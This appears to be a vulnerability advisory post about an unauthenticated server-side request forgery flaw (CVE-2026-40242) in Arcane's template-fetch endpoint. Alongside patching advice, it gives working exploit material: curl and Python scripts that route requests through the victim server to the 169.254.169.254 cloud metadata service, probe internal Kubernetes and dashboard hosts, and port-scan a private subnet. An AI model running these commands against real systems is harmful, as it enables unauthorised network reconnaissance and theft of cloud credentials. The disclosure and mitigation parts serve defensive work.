Listen to this Post
How CVE-2026-40242 Works
The vulnerability exists in the `/api/templates/fetch` endpoint of Arcane versions prior to 1.17.3. The endpoint accepts a caller-supplied `url` parameter and performs a server-side HTTP GET request to that URL without any authentication checks or validation of the URL scheme or destination host. This lack of validation allows an attacker to make the Arcane server send arbitrary HTTP GET requests to any target, including internal network resources. The server’s response is then returned directly to the attacker. The response handling produces four distinct leak channels that can be used for different types of internal reconnaissance:
1. JSON Reflection: If the target returns valid JSON that matches the expected internal struct, the full response body is reflected back.
2. Non-JSON HTTP 200: Returns an error that leaks the first byte of the response, e.g., "Invalid JSON response: invalid character '<'...".
3. Non-200 HTTP Status: Leaks the HTTP status code (e.g., 404, 500), revealing if a service is listening.
4. TCP-Level Failures: Distinguishes between closed ports (connection refused) and filtered ports (i/o timeout), enabling precise network mapping.
A proof-of-concept is as simple as sending an unauthenticated GET request to `/api/templates/fetch?url=http://internal-service/`.
DailyCVE Form
Platform: Arcane (getarcaneapp)
Version: < 1.17.3
Vulnerability: Unauthenticated SSRF
Severity: High (7.2)
Date: 2026-04-10
Prediction: 2026-04-10
Analytics (What Undercode Say)
Enumerate reachable internal IPs and ports
for port in 80 443 8080 8443 2375 6443; do
curl -s "https://target.com/api/templates/fetch?url=http://169.254.169.254:${port}/" | grep -i "Invalid JSON|connection refused"
done
Python script for internal service discovery
import requests
target = "https://target.com/api/templates/fetch"
internal_services = [
"http://169.254.169.254/latest/meta-data/",
"http://kubernetes.default.svc/",
"http://internal-dashboard.local/"
]
for service in internal_services:
response = requests.get(target, params={"url": service})
if "Invalid JSON" in response.text:
print(f"[+] Potential service at {service}")
Exploit
Leak internal AWS metadata curl "https://victim.com/api/templates/fetch?url=http://169.254.169.254/latest/meta-data/"
Port scan internal subnet (192.168.1.0/24)
for i in {1..254}; do
curl -s "https://victim.com/api/templates/fetch?url=http://192.168.1.${i}:22/" | grep -q "connection refused" || echo "Host 192.168.1.${i} has port 22 open"
done
Protection
- Upgrade to Arcane version 1.17.3 or later where the endpoint includes proper URL scheme and host validation.
- Implement network-level controls to restrict outbound HTTP requests from the Arcane server.
- Use a Web Application Firewall (WAF) to block requests containing suspicious `url` parameters.
- Conduct a code review to ensure no similar endpoints exist in custom builds.
Impact
Internal Network Reconnaissance: Attackers can scan for open ports and live hosts behind the firewall.
Access to Internal HTTP Services: Unauthenticated access to internal dashboards, service discovery endpoints, and the Kubernetes API.
Cloud Metadata Exposure: Ability to query cloud provider metadata services (e.g., AWS, GCP, Azure) for credentials.
Low Barrier to Exploitation: No authentication required, low attack complexity, and no user interaction needed.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

